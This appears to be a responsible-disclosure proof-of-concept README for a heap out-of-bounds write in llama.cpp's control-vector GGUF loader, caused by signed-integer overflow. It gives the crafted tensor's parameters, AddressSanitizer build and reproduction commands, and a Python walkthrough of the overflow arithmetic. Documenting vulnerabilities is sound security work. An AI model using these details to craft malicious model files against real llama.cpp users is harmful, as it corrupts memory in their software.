	# PoC: heap OOB write in llama.cpp control-vector GGUF loader

	`malicious_cv.gguf` triggers a heap out-of-bounds write in
	`common_control_vector_load_one()` when llama.cpp loads it as a control vector
	(`--control-vector`), via a signed-integer overflow in the buffer-size /
	write-offset arithmetic. Responsible-disclosure PoC for a huntr report. Not for malicious use.

	## Files
	- `malicious_cv.gguf` — malicious control-vector model: one tensor `direction.1431655766`, F32, `ne=[3]`.
	- `craft_cv_gguf.py` — how it was generated (`pip install gguf`, then `python craft_cv_gguf.py`).
	- `cv_load_harness.cpp` — minimal harness calling the public `common_control_vector_load()`.

	## Reproduce (Linux + AddressSanitizer)
	```bash
	git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp

	# Build the WHOLE tree (incl. the `common` lib) with AddressSanitizer.
	# (Note: -DGGML_SANITIZE_ADDRESS=ON alone only instruments ggml, NOT common —
	# use global flags so the control-vector loader is instrumented.)
	cmake -B build-asan -DCMAKE_BUILD_TYPE=Debug \
	-DCMAKE_C_FLAGS="-fsanitize=address -g -fno-omit-frame-pointer" \
	-DCMAKE_CXX_FLAGS="-fsanitize=address -g -fno-omit-frame-pointer" \
	-DBUILD_SHARED_LIBS=OFF -DLLAMA_CURL=OFF -DGGML_NATIVE=OFF
	cmake --build build-asan --target common -j"$(nproc)"

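	# Build the harness against the ASan static libs (adjust include and .a paths to your tree).
	# If linking fails on OpenMP symbols, add -fopenmp or configure with -DGGML_OPENMP=OFF.
	g++ -std=c++17 -fsanitize=address -g -fno-omit-frame-pointer \
	-I. -Icommon -Iinclude -Iggml/include cv_load_harness.cpp \
	build-asan/common/libcommon.a build-asan/src/libllama.a build-asan/ggml/src/*.a \
	-lpthread -lm -o cv_load_harness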

	./cv_load_harness malicious_cv.gguf
	```

	Expected: ASan reports `heap-buffer-overflow WRITE of size 4` in
	`common_control_vector_load_one` (`common/common.cpp:1865`), located **4 bytes
	before** the 8-byte buffer allocated by the overflowed `resize()` at
	`common/common.cpp:1860`. The harness also prints `n_embd=3 data_size=2`
	(the undersized buffer from the wrap).
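
The numbers above can be checked by hand. The sketch below is only an illustration: it assumes the loader computes the buffer length as `n_embd * layer_idx` and the write offset as `n_embd * (layer_idx - 1)` in 32-bit signed `int` arithmetic, which is inferred from the reported `data_size=2` and the "4 bytes before" location rather than quoted from `common/common.cpp`. Signed overflow is undefined behaviour in C++; the two's-complement wrap modelled here is what typical builds produce. `wrap_int32` is a hypothetical helper, not part of llama.cpp.

```python
def wrap_int32(value: int) -> int:
    """Model the value a 32-bit two's-complement int holds after wrapping."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


N_EMBD = 3                # ne[0] of the tensor in malicious_cv.gguf
LAYER_IDX = 1431655766    # parsed from the tensor name "direction.1431655766"
SIZEOF_FLOAT = 4          # F32 elements

# Assumed expressions (see lead-in): both products exceed INT32_MAX.
data_size = wrap_int32(N_EMBD * LAYER_IDX)            # 4294967298 wraps to 2
write_offset = wrap_int32(N_EMBD * (LAYER_IDX - 1))   # 4294967295 wraps to -1

buffer_bytes = data_size * SIZEOF_FLOAT               # size of the resized buffer
offset_bytes = write_offset * SIZEOF_FLOAT            # where the first write lands

print(f"n_embd={N_EMBD} data_size={data_size}")
print(f"buffer is {buffer_bytes} bytes, first write at byte offset {offset_bytes}")
```

Under these assumptions the buffer holds 2 floats (8 bytes) and the first element written sits at offset -1 float, i.e. 4 bytes before the allocation, which matches the ASan report described above.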

	Because `dst[j] += …` is a read-modify-write, a default (halting) ASan build
	stops at the out-of-bounds read of that address and never reaches the store.
	To surface the WRITE report as well, build with `-fsanitize-recover=address`
	and run with `ASAN_OPTIONS=halt_on_error=0`.

	Also reproducible in the real tool:
	`llama-cli -m <any model> --control-vector malicious_cv.gguf -p hi` under ASan.